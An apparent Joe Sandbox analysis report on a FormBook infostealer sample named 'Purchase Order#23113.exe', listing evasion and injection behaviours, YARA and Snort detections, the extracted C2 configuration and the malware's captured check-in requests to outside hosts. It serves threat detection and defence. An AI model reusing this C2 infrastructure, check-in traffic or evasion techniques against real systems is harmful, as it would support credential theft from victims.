Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order#23113.exe

Overview

General Information

Sample name:Purchase Order#23113.exe
Analysis ID:1422056
MD5:fa3e92f061246f3b1625e6f8b8291836
SHA1:a58763445fe7359a7b0a527ec1dc00ecdc7337f0
SHA256:ca1d2592c9726d9e3a6a57c55ac57b40d9aa3bc501393a40962afd5bd4946433
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Purchase Order#23113.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\Purchase Order#23113.exe" MD5: FA3E92F061246F3B1625E6F8B8291836)
    • Purchase Order#23113.exe (PID: 6636 cmdline: "C:\Users\user\Desktop\Purchase Order#23113.exe" MD5: FA3E92F061246F3B1625E6F8B8291836)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cscript.exe (PID: 1068 cmdline: "C:\Windows\SysWOW64\cscript.exe" MD5: CB601B41D4C8074BE8A84AED564A94DC)
          • cmd.exe (PID: 6324 cmdline: /c del "C:\Users\user\Desktop\Purchase Order#23113.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.yoursweets.online/vr01/"], "decoy": ["eclipsefoodservice.com", "oregonjobs.co", "ethicai.pro", "frontierconnects.co", "elcaporalburley.com", "exoticskinco.com", "topdeals.biz", "carmensbookstore.com", "mayorii.com", "viewhird.com", "bharatcrimecontrol24news.com", "sampleshubusa.com", "molobeverello.com", "nicholsonflooringservices.com", "kidscircle.shop", "771010.cc", "poseidoncrm.com", "liviafiorelli.com", "flavorfog.online", "xaqh.info", "bombslot-42.co", "floatshop.store", "massagechairspecialists.com", "mks-digital.net", "wti395.vip", "entelnegocio.com", "ansemgram.com", "owletbaby.shop", "skyhut.io", "kakevpn.com", "protectmichildren.net", "gratiasempirellc.com", "hsyxkj.com", "kirtirefrigeration.com", "makeyousurprise.com", "qqixe.shop", "svshop.us", "yesxoit.xyz", "jupitr-claim.top", "laneflowlogistics.com", "brandonbirk.com", "vjll.net", "maturak-na-klic.online", "mingshengglass.com", "theshopsatmaunalani.com", "accidentapp.online", "fertnow.com", "nicolbauer.com", "mym-agency.com", "efxprm.com", "studioenginedemo.com", "erabits.com", "chhpiyg.pro", "adadripdropz.com", "dropperdeals.com", "viphao200.com", "lasik-eye-surgery-45089.bond", "helyibudapest.com", "michellecaldwelldesign.com", "snugandkind.com", "redirect2-userweb.com", "pataltarghya.com", "tumi123ans.lol", "familyofficesheet.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.Purchase Order#23113.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.Purchase Order#23113.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.Purchase Order#23113.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          2.2.Purchase Order#23113.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.Purchase Order#23113.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18849:$sqlite3step: 68 34 1C 7B E1
          • 0x1895c:$sqlite3step: 68 34 1C 7B E1
          • 0x18878:$sqlite3text: 68 38 2A 90 C5
          • 0x1899d:$sqlite3text: 68 38 2A 90 C5
          • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 10 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:04/08/24-10:06:49.944631
          SID:2031412
          Source Port:49750
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/08/24-10:06:29.007960
          SID:2031412
          Source Port:49749
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/08/24-10:03:45.371301
          SID:2031412
          Source Port:49744
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/08/24-10:04:46.028484
          SID:2031412
          Source Port:49746
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/08/24-10:07:11.266292
          SID:2031412
          Source Port:49751
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/08/24-10:04:25.566585
          SID:2031412
          Source Port:49745
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/08/24-10:05:47.854456
          SID:2031412
          Source Port:49748
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/08/24-10:05:27.536502
          SID:2031412
          Source Port:49747
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:04/08/24-10:03:25.123202
          SID:2031412
          Source Port:49742
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://www.yoursweets.onlineAvira URL Cloud: Label: malware
          Source: http://www.yoursweets.online/vr01/www.massagechairspecialists.comAvira URL Cloud: Label: malware
          Source: www.yoursweets.online/vr01/Avira URL Cloud: Label: malware
          Source: http://www.yoursweets.online/vr01/Avira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.yoursweets.online/vr01/"], "decoy": ["eclipsefoodservice.com", "oregonjobs.co", "ethicai.pro", "frontierconnects.co", "elcaporalburley.com", "exoticskinco.com", "topdeals.biz", "carmensbookstore.com", "mayorii.com", "viewhird.com", "bharatcrimecontrol24news.com", "sampleshubusa.com", "molobeverello.com", "nicholsonflooringservices.com", "kidscircle.shop", "771010.cc", "poseidoncrm.com", "liviafiorelli.com", "flavorfog.online", "xaqh.info", "bombslot-42.co", "floatshop.store", "massagechairspecialists.com", "mks-digital.net", "wti395.vip", "entelnegocio.com", "ansemgram.com", "owletbaby.shop", "skyhut.io", "kakevpn.com", "protectmichildren.net", "gratiasempirellc.com", "hsyxkj.com", "kirtirefrigeration.com", "makeyousurprise.com", "qqixe.shop", "svshop.us", "yesxoit.xyz", "jupitr-claim.top", "laneflowlogistics.com", "brandonbirk.com", "vjll.net", "maturak-na-klic.online", "mingshengglass.com", "theshopsatmaunalani.com", "accidentapp.online", "fertnow.com", "nicolbauer.com", "mym-agency.com", "efxprm.com", "studioenginedemo.com", "erabits.com", "chhpiyg.pro", "adadripdropz.com", "dropperdeals.com", "viphao200.com", "lasik-eye-surgery-45089.bond", "helyibudapest.com", "michellecaldwelldesign.com", "snugandkind.com", "redirect2-userweb.com", "pataltarghya.com", "tumi123ans.lol", "familyofficesheet.com"]}
          Multi AV Scanner detection for submitted file
          Source: Purchase Order#23113.exeReversingLabs: Detection: 31%
          Source: Purchase Order#23113.exeVirustotal: Detection: 39%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Machine Learning detection for sample
          Source: Purchase Order#23113.exeJoe Sandbox ML: detected
          Source: Purchase Order#23113.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Purchase Order#23113.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cscript.pdbUGP source: Purchase Order#23113.exe, 00000002.00000002.1819119178.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Purchase Order#23113.exe, 00000002.00000002.1819543047.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: eGGj.pdb source: Purchase Order#23113.exe
          Source: Binary string: eGGj.pdbSHA256 source: Purchase Order#23113.exe
          Source: Binary string: wntdll.pdbUGP source: Purchase Order#23113.exe, 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.1818306118.0000000004B6B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.1821000587.0000000004D1D000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Purchase Order#23113.exe, Purchase Order#23113.exe, 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000003.1818306118.0000000004B6B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.1821000587.0000000004D1D000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cscript.pdb source: Purchase Order#23113.exe, 00000002.00000002.1819119178.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Purchase Order#23113.exe, 00000002.00000002.1819543047.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_00712674 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,__alloca_probe_16,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,4_2_00712674
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 4x nop then jmp 07FB8D85h0_2_07FB8AA5
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 4x nop then jmp 07FB8D85h0_2_07FB881E

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49742 -> 172.67.165.166:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49744 -> 102.134.40.151:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49745 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49746 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49747 -> 66.235.200.146:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49748 -> 13.248.169.48:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49749 -> 45.76.63.192:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49750 -> 66.147.240.91:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49751 -> 45.88.201.15:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 13.248.169.48 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 102.134.40.151 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.76.63.192 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.165.166 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.147.240.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.146 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.yoursweets.online/vr01/
          Source: global trafficHTTP traffic detected: GET /vr01/?Vr=L4nHMf5x&YN9P-lUP=IPhgDyoL8PETBIlA+LipHiQIJ5tdYs8vDEe7V5bx7imqp8ZSB+vz7lbDvtba/1SpkLzf HTTP/1.1Host: www.xaqh.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?YN9P-lUP=p/xcNqyzh27Txsj3CquMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRnhiYBgsx3b&Vr=L4nHMf5x HTTP/1.1Host: www.mingshengglass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?YN9P-lUP=S/bPAjqIKQKwHrqZpy8n8RiCdt73FJpF/P8H7i/MmAA1ELfbDMBmDqe40tCi9lxWreLB&Vr=L4nHMf5x HTTP/1.1Host: www.massagechairspecialists.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?Vr=L4nHMf5x&YN9P-lUP=fg5rWdIOm16VAcpULIi6VqF28GIEm83UbJ9UUTJ5CcfameYBqVWF6xiHMvk1uSJgUfvX HTTP/1.1Host: www.mks-digital.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?Vr=L4nHMf5x&YN9P-lUP=GUL62cbCCJOJReCemxk1O8Otc3kXCElGSolYG/8Ig6Cn2Nx69M0sY0/cN1gdp8glXS6z HTTP/1.1Host: www.snugandkind.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?YN9P-lUP=om+RAj9K10xplgkf4U8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuSpikjnaupQL&Vr=L4nHMf5x HTTP/1.1Host: www.owletbaby.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?YN9P-lUP=9c9cKs9OosrhOa63FDxOZSQTlUYWLUzvl6rD164QiuJtlecCGMWXkWvi90D7WwOzyhmU&Vr=L4nHMf5x HTTP/1.1Host: www.studioenginedemo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?Vr=L4nHMf5x&YN9P-lUP=wFZ5enEBtK4n2aaiRnhfStMJiblJh5bHmGRWjDpakqkf/10aPf5zMfbio25A5myUwmpi HTTP/1.1Host: www.oregonjobs.coConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 66.235.200.146 66.235.200.146
          Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: sun-asnSC sun-asnSC
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 3_2_0E63EF82 getaddrinfo,setsockopt,recv,3_2_0E63EF82
          Source: global trafficHTTP traffic detected: GET /vr01/?Vr=L4nHMf5x&YN9P-lUP=IPhgDyoL8PETBIlA+LipHiQIJ5tdYs8vDEe7V5bx7imqp8ZSB+vz7lbDvtba/1SpkLzf HTTP/1.1Host: www.xaqh.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?YN9P-lUP=p/xcNqyzh27Txsj3CquMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRnhiYBgsx3b&Vr=L4nHMf5x HTTP/1.1Host: www.mingshengglass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?YN9P-lUP=S/bPAjqIKQKwHrqZpy8n8RiCdt73FJpF/P8H7i/MmAA1ELfbDMBmDqe40tCi9lxWreLB&Vr=L4nHMf5x HTTP/1.1Host: www.massagechairspecialists.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?Vr=L4nHMf5x&YN9P-lUP=fg5rWdIOm16VAcpULIi6VqF28GIEm83UbJ9UUTJ5CcfameYBqVWF6xiHMvk1uSJgUfvX HTTP/1.1Host: www.mks-digital.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?Vr=L4nHMf5x&YN9P-lUP=GUL62cbCCJOJReCemxk1O8Otc3kXCElGSolYG/8Ig6Cn2Nx69M0sY0/cN1gdp8glXS6z HTTP/1.1Host: www.snugandkind.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?YN9P-lUP=om+RAj9K10xplgkf4U8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuSpikjnaupQL&Vr=L4nHMf5x HTTP/1.1Host: www.owletbaby.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?YN9P-lUP=9c9cKs9OosrhOa63FDxOZSQTlUYWLUzvl6rD164QiuJtlecCGMWXkWvi90D7WwOzyhmU&Vr=L4nHMf5x HTTP/1.1Host: www.studioenginedemo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vr01/?Vr=L4nHMf5x&YN9P-lUP=wFZ5enEBtK4n2aaiRnhfStMJiblJh5bHmGRWjDpakqkf/10aPf5zMfbio25A5myUwmpi HTTP/1.1Host: www.oregonjobs.coConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.xaqh.info
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 08 Apr 2024 08:04:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4518Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 08 Apr 2024 08:04:40 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wANL7iq3n8fB6IVRAeYwRGh3sIo3VeJH9A%2F9X5RFh%2BF5wEjXy8HwdWZHaJonMe%2BesMkpMRkY4I4hP%2F17Mbxycb2CIz1YJ63HVLOQazvBus2LQ3%2Br4eGUcfnpnWWgzX8dahcqg3PacsXGW40pfKWENZg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=8.000135X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8710bf1c2b697425-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta h
